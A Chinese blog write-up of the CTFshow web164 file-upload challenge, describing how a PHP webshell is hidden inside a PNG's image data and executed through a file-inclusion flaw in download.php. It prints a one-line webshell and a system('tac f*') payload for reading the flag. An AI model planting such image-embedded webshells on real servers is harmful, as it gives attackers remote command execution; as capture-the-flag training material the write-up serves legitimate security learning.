CTFshow 文件上传 web164

目录


思路

直接在burp里面改targethost的值,或者在本地发包
在这里插入图片描述
在这里插入图片描述
多次尝试后,发现除了正常的png图片,都无法上传,猜测用图片马上传

https://github.com/huntergregal/PNG-IDAT-Payload-Generator

虽然上传成功,但把后缀改成任意字符串却被拦截,猜测是白名单
在这里插入图片描述
.user.ini也无法正常上传,应该有其他的点可以利用.

直接在网站上上传图片马后,发现显示查看图片

在这里插入图片描述
点击查看图片后,跳转到/download.php?image=a976285aa6d6096e9edd17db289a73a9.png,图片也能正常显示,而且也不在upload目录,很明显当前目录存在文件包含

我们传入参数0和1,拼接成<?=system("tac f*");?>,但是页面没有回显,仍然是张图片

<?=$_GET[0]($_POST[1]);?>

下载查看图片,拿到flag

在这里插入图片描述

总结

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值